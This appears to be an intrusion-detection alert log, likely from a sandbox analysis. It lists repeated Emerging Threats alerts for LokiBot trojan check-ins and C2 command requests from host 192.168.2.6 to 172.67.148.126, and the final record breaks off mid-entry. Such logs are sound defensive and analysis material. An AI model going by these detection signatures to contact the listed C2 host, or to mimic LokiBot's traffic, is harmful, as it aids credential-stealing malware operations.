ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:22.429106
SID:	2024318
Source Port:	49869
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:38.088060
SID:	2024318
Source Port:	49816
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:10.080334
SID:	2025381
Source Port:	49855
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:47.378472
SID:	2825766
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:29.470677
SID:	2825766
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:20.970310
SID:	2825766
Source Port:	49793
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:38.088060
SID:	2024313
Source Port:	49816
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:15.205072
SID:	2021641
Source Port:	49786
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:58.921065
SID:	2825766
Source Port:	49765
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:20.206304
SID:	2024313
Source Port:	49792
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:04.659572
SID:	2825766
Source Port:	49847
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:27.986411
SID:	2025381
Source Port:	49802
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:24.137227
SID:	2021641
Source Port:	49717
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:00.493399
SID:	2025381
Source Port:	49767
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:38.861510
SID:	2024313
Source Port:	49818
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:27.906071
SID:	2825766
Source Port:	49722
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:11.314149
SID:	2825766
Source Port:	49780
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:12.096911
SID:	2021641
Source Port:	49781
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:20.907030
SID:	2024318
Source Port:	49867
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:20.907030
SID:	2024313
Source Port:	49867
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:48.957388
SID:	2825766
Source Port:	49829
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:29.547586
SID:	2025381
Source Port:	49804
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:46.581121
SID:	2024318
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:28.779878
SID:	2021641
Source Port:	49803
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:56.772335
SID:	2024313
Source Port:	49839
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:11.610579
SID:	2825766
Source Port:	49857
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:38.799315
SID:	2024313
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:25.641172
SID:	2021641
Source Port:	49799
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:23.301208
SID:	2021641
Source Port:	49796
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:38.799315
SID:	2024318
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:56.772335
SID:	2024318
Source Port:	49839
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:38.861510
SID:	2024318
Source Port:	49818
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:36.516498
SID:	2825766
Source Port:	49814
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:09.316933
SID:	2025381
Source Port:	49853
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:19.440133
SID:	2021641
Source Port:	49791
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:21.735500
SID:	2021641
Source Port:	49794
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:57.593507
SID:	2025381
Source Port:	49840
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:21.669304
SID:	2825766
Source Port:	49868
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:48.178974
SID:	2021641
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:31.298967
SID:	2825766
Source Port:	49727
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:51.123133
SID:	2825766
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:12.357168
SID:	2025381
Source Port:	49858
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:50.516269
SID:	2021641
Source Port:	49831
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:24.825007
SID:	2021641
Source Port:	49872
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:19.440133
SID:	2825766
Source Port:	49791
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:30.251229
SID:	2021641
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:38.036927
SID:	2025381
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:18.674487
SID:	2024318
Source Port:	49790
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:46.592042
SID:	2024313
Source Port:	49826
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:37.260471
SID:	2025381
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:46.592042
SID:	2024318
Source Port:	49826
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:18.674487
SID:	2024313
Source Port:	49790
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:59.690030
SID:	2021641
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:45.799677
SID:	2825766
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:47.361321
SID:	2825766
Source Port:	49827
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:22.504191
SID:	2024313
Source Port:	49795
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:08.547895
SID:	2825766
Source Port:	49852
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:22.504191
SID:	2024318
Source Port:	49795
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:21.669304
SID:	2021641
Source Port:	49868
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:52.865138
SID:	2825766
Source Port:	49834
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:05.124910
SID:	2021641
Source Port:	49773
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:15.463121
SID:	2021641
Source Port:	49862
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:26.328739
SID:	2025381
Source Port:	49720
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:14.423119
SID:	2024313
Source Port:	49785
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:41.891260
SID:	2825766
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:15.972978
SID:	2025381
Source Port:	49787
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:56.595283
SID:	2024318
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:14.423119
SID:	2024318
Source Port:	49785
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:57.360186
SID:	2825766
Source Port:	49763
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:56.595283
SID:	2024313
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:52.865138
SID:	2021641
Source Port:	49834
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:13.897343
SID:	2025381
Source Port:	49860
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:03.603579
SID:	2025381
Source Port:	49771
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:51.314444
SID:	2025381
Source Port:	49832
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:27.906071
SID:	2021641
Source Port:	49722
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:24.137227
SID:	2825766
Source Port:	49717
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:44.269499
SID:	2024313
Source Port:	49823
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:45.801533
SID:	2025381
Source Port:	49825
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:52.706701
SID:	2024313
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:08.547895
SID:	2021641
Source Port:	49852
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:54.259588
SID:	2025381
Source Port:	49759
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:03.891737
SID:	2024318
Source Port:	49846
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:05.441892
SID:	2025381
Source Port:	49848
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:31.133120
SID:	2825766
Source Port:	49806
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:35.705322
SID:	2024313
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:24.839758
SID:	2025381
Source Port:	49718
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:30.339047
SID:	2024318
Source Port:	49805
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:45.042075
SID:	2825766
Source Port:	49824
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:20.136720
SID:	2025381
Source Port:	49866
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:41.891260
SID:	2021641
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:18.590588
SID:	2024313
Source Port:	49864
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:35.705322
SID:	2024318
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:34.975531
SID:	2021641
Source Port:	49811
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:18.590588
SID:	2024318
Source Port:	49864
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:52.706701
SID:	2024318
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:09.757970
SID:	2025381
Source Port:	49777
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:44.269499
SID:	2024318
Source Port:	49823
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:03.891737
SID:	2024313
Source Port:	49846
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:57.360186
SID:	2021641
Source Port:	49763
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:30.339047
SID:	2024313
Source Port:	49805
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:04.359604
SID:	2024318
Source Port:	49772
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:15.205072
SID:	2825766
Source Port:	49786
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:17.895022
SID:	2825766
Source Port:	49789
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:55.812911
SID:	2025381
Source Port:	49761
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:06.739588
SID:	2024318
Source Port:	49775
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:06.739588
SID:	2024313
Source Port:	49775
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:31.907019
SID:	2025381
Source Port:	49807
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:14.663983
SID:	2024318
Source Port:	49861
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:06.999341
SID:	2025381
Source Port:	49850
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:42.736556
SID:	2021641
Source Port:	49821
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:41.115114
SID:	2024313
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:42.690473
SID:	2025381
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:52.096160
SID:	2024318
Source Port:	49833
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:43.454363
SID:	2024313
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:53.641650
SID:	2025381
Source Port:	49835
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:54.422589
SID:	2024313
Source Port:	49836
